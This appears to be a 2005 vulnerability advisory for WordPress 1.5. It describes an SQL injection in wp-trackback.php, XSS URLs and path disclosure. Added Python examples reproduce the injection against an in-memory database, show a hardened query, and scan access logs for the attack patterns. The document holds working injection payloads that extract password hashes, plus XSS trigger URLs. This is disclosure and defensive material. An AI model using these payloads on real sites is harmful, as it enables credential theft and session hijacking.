WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability".
Multiple security vulnerabilities have been found in WordPress. They range from an SQL injection that can reveal password hashes, through cross-site scripting vulnerabilities, to path disclosure issues.
Credit:
The information has been provided by Thomas Waldegger.
Vulnerable Systems:
* WordPress version 1.5 and prior
Immune Systems:
* WordPress version 1.5.1 or newer
SQL Injection:
The most critical vulnerability in the 1.5 release of WordPress is an SQL injection in `wp-trackback.php'. It is not easily exploitable, because injecting a valid query returns no result to the requester, but it is possible to brute-force values in the tables, for example the password hashes.
Here are some details:
The parameter `tb_id' in `wp-trackback.php' is not validated correctly and the value is not quoted in the SQL query, so an attacker is able to insert SQL commands.
$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts WHERE ID = $tb_id");
Example:
> $tb_id = 1 union select user_pass,0 from wp_users
> $url = bla
> $title = bla
</wp-trackback.php?tb_id=1 union select 0,user_pass from wp_users&url=bla&title=bla>
By injecting this query we get the following database error:
> WordPress database error:
> [The used SELECT statements have a different number of columns]
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,
> user_pass from wp_users
When we insert "1 union select user_pass from wp_users" as the value for `tb_id' we get no error message, because the query is well-formed, as expected. Since arbitrary SQL can be appended, it is possible to reconstruct values from the tables.
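The unquoted query above, modelled in Python against a constructed in-memory SQLite database. This is an added example, not WordPress code: the table contents, the `build_db` helper and the `ping_status_hardened` function are assumptions, and the hardened form is a generic fix (strict digit check plus parameter binding), not WordPress's own patch. It reproduces the advisory's two outcomes (column-count error versus silently well-formed query) and shows that the hardened version never lets the value reach the SQL parser.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the two tables the advisory names."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, ping_status TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_pass TEXT);
        INSERT INTO wp_posts VALUES (1, 'open');
        INSERT INTO wp_users VALUES (1, 'constructed-hash-value');
        """
    )
    return con


def ping_status_vulnerable(con: sqlite3.Connection, tb_id: str):
    """Mirrors the advisory's query: tb_id is interpolated unquoted and
    unvalidated, so the whole string is parsed as SQL.

    Returns ("rows", rows) or ("error", message) so a caller can see which
    of the advisory's two outcomes a given value produces."""
    sql = f"SELECT ping_status FROM wp_posts WHERE ID = {tb_id}"
    try:
        return ("rows", con.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        # SQLite's wording differs from MySQL's "different number of columns",
        # but it is the same column-count mismatch the advisory quotes.
        return ("error", str(exc))


def ping_status_hardened(con: sqlite3.Connection, tb_id: str):
    """Assumed fix (not WordPress's own patch): accept only a string of
    digits, then bind it as a parameter, so the value is never SQL."""
    if not re.fullmatch(r"\d+", tb_id):
        return ("rejected", None)
    rows = con.execute(
        "SELECT ping_status FROM wp_posts WHERE ID = ?", (int(tb_id),)
    ).fetchall()
    return ("rows", rows)


if __name__ == "__main__":
    db = build_db()
    for value in ("1",
                  "1 union select 0,user_pass from wp_users",
                  "1 union select user_pass from wp_users"):
        print(repr(value))
        print("  vulnerable:", ping_status_vulnerable(db, value))
        print("  hardened:  ", ping_status_hardened(db, value))
```

The two-column payload produces a column-count error in both engines; the one-column payload returns a result set that now contains a row from `wp_users`, which is exactly why the advisory says values can be reconstructed even though the caller only ever sees the first cell. The hardened function rejects both payloads before any query runs.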
XSS:
The following two URLs can be used to trigger the cross site scripting vulnerability on the remote host:
http://vulnerable/wp-admin/edit.php?s=[XSS]&submit=Search
http://vulnerable/wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]
Path Disclosure:
The following three URLs can be used to trigger the path disclosure vulnerability on the remote host:
http://vulnerable/wordpress-1.5-strayhorn/wp-content/themes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-includes/*
http://vulnerable/wordpress-1.5-strayhorn/wp-admin/*
> Fatal error: Call to undefined function add_filter() in
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/
> wp-content/themes/classic/comments-popup.php on line 3
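A detection pass over web-server access logs for the three request shapes described in the SQL injection, XSS and path disclosure sections above. This is an added example, not part of the advisory: the log lines are constructed (addresses and timestamps are made up), the rule names are assumptions, and the rules simply encode what the advisory states: a non-numeric `tb_id` on `wp-trackback.php`, angle brackets in the `s` or `p` parameter of a `wp-admin` script, and a direct request for a `.php` file under `wp-content/themes/` or `wp-includes/`.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-format access log; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample traffic: one hit per advisory pattern plus benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [17/May/2005:10:00:01 +0000] "GET /wp-trackback.php?tb_id=1&url=bla&title=bla HTTP/1.0" 200 512 "-" "-"
10.0.0.7 - - [17/May/2005:10:00:02 +0000] "GET /wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20wp_users&url=bla&title=bla HTTP/1.0" 200 640 "-" "-"
10.0.0.7 - - [17/May/2005:10:00:03 +0000] "GET /wp-admin/edit.php?s=%3Cscript%3Ealert(1)%3C/script%3E&submit=Search HTTP/1.0" 200 2048 "-" "-"
10.0.0.8 - - [17/May/2005:10:00:04 +0000] "GET /wp-admin/edit.php?s=hello&submit=Search HTTP/1.0" 200 2048 "-" "-"
10.0.0.9 - - [17/May/2005:10:00:05 +0000] "GET /wp-content/themes/classic/comments-popup.php HTTP/1.0" 200 300 "-" "-"
10.0.0.9 - - [17/May/2005:10:00:06 +0000] "GET /wp-content/themes/classic/style.css HTTP/1.0" 200 3000 "-" "-"
"""


def classify(target: str):
    """Return the name of the advisory pattern a request target matches, or None.

    parse_qs percent-decodes the values, so the checks run on the decoded form."""
    parts = urlsplit(target)
    path, params = parts.path, parse_qs(parts.query)

    # SQL injection section: tb_id must be a plain integer.
    if path.endswith("/wp-trackback.php"):
        for value in params.get("tb_id", []):
            if not re.fullmatch(r"\d+", value):
                return "trackback_sqli"

    # XSS section: the search term (edit.php?s=) and post id (post.php?p=)
    # are echoed into the admin page, so markup in them is suspicious.
    if path.startswith("/wp-admin/"):
        for key in ("s", "p"):
            for value in params.get(key, []):
                if "<" in value or ">" in value:
                    return "admin_xss"

    # Path disclosure section: theme and include files are meant to be
    # included by WordPress, not requested directly.
    if (path.startswith("/wp-content/themes/") or path.startswith("/wp-includes/")) \
            and path.endswith(".php"):
        return "direct_include"
    return None


def scan(log_text: str):
    """Return (rule, client ip, request target) for every matching log line."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line; skip rather than abort the scan
        rule = classify(match.group("target"))
        if rule:
            findings.append((rule, match.group("ip"), match.group("target")))
    return findings


if __name__ == "__main__":
    for rule, ip, target in scan(SAMPLE_LOG):
        print(f"{rule:16} {ip:10} {target}")
```

The `wp-admin/*` case from the path disclosure list is deliberately not covered by `direct_include`, because admin scripts are requested directly in normal use; distinguishing a probe there needs the response status (a 500 from the fatal error) or the PHP error log rather than the request line alone.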
Solution:
Upgrade to WordPress version 1.5.1 or newer.
Disclosure Timeline:
17 Apr 05 - Security flaws discovered
19 Apr 05 - Vendor contacted
10 May 05 - Vendor released bugfixed version
17 May 05 - Public release